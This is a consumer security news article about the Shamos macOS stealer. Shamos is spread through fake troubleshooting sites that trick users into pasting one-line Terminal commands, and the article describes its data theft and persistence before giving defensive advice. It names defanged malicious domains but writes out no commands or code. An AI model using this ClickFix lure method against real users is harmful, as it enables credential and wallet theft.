A new malware campaign, Shamos, is targeting Mac users by exploiting fake troubleshooting websites to install malicious software through deceptive terminal commands.
A dangerous new malware campaign is on the rise, specifically targeting Mac users globally. Security researchers at CrowdStrike have identified Shamos, a new variant of the Atomic macOS Stealer (AMOS), developed by a cybercriminal group known as COOKIE SPIDER.
This attack employs ClickFix tactics, where victims searching for Mac troubleshooting assistance are lured to counterfeit websites or GitHub repositories. These fraudulent sites trick users into copying and pasting a one-line command into Terminal, which is purportedly meant to fix an error. Instead of resolving issues, this command silently downloads Shamos, bypassing macOS Gatekeeper protections and installing the malware.
Once installed, Shamos begins to search for sensitive information, including Apple Notes, Keychain items, browser passwords, and even cryptocurrency wallets. The stolen data is compressed and sent directly to the attackers, often alongside additional malware such as botnet modules or counterfeit Ledger wallet applications.
Cybercriminals distribute these deceptive “fixes” through malvertising campaigns and spoofed tech support websites, which often bear names like mac-safer[.]com or rescue-mac[.]com. These sites masquerade as trusted troubleshooting guides and appear prominently in search results for common Mac issues, such as “how to flush resolver cache.”
Victims are encouraged to copy and paste commands that download malicious Bash scripts. These scripts can capture the user’s password, remove file protections, and launch Shamos. With persistence tools in place, the malware can even restart alongside the system, maintaining control long after the initial infection.
To avoid falling victim to Shamos and similar threats, users should take proactive measures. While copy-pasting commands into Terminal may seem like a quick fix, it is also one of the easiest ways for attackers to circumvent Apple’s built-in protections. If you encounter a command on a website, forum, or GitHub repository, do not execute it unless you fully understand its function. Instead, verify the command with Apple’s official support site or the Apple Community forums, where experienced users and moderators can confirm safe troubleshooting steps.
Hackers are aware that when a Mac experiences issues, users often seek quick solutions. This urgency is exploited through sponsored ads that push fake troubleshooting websites higher in search results. Clicking on the top link may seem natural, but it could lead to a trap. It is advisable to stick with trusted sources like Apple Support or scroll past the ads to locate legitimate guides.
While GitHub is a valuable resource for developers, it has also become a hotspot for malicious repositories that mimic legitimate software. Attackers frequently clone popular applications or tools, embedding malware within them. Before downloading anything, users should check the publisher’s name, the number of stars, and the activity history. If the account appears suspicious, inactive, or newly created, it is best to avoid it.
Mac malware is evolving rapidly, and Apple’s built-in security features cannot catch everything. Utilizing a robust antivirus solution adds another layer of defense by scanning downloads, blocking malicious scripts, and detecting suspicious behavior in real time. Some security tools can even identify the one-line Terminal commands used by Shamos before they can inflict damage.
As Shamos is designed to steal personal information and transmit it to cybercriminals, reducing your online footprint can help mitigate the potential fallout. A personal data removal service can scan data broker sites and eliminate your exposed information, making it more difficult for attackers to resell or exploit it following a breach. Although this measure won’t prevent malware from stealing data already on your Mac, it does provide an additional layer of protection by minimizing the data available for criminals to use against you.
Apple regularly patches vulnerabilities in macOS that malware attempts to exploit. Keeping your system updated is crucial for closing the doors that attackers rely on. Enabling automatic updates ensures that your Mac receives the latest patches as soon as they become available. Coupled with good digital hygiene, such as avoiding dubious downloads, this practice significantly lowers the risk of infection.
Cybercriminals understand that when a Mac malfunctions, users are likely to seek immediate solutions. Shamos capitalizes on this urgency by disguising itself as helpful assistance. Staying safe requires users to slow down before copying, pasting, or downloading anything. If something seems off, it probably is.
Should Apple be doing more to protect Mac users from evolving threats like Shamos? Share your thoughts by reaching out to us at Cyberguy.com/Contact.
Source: Original article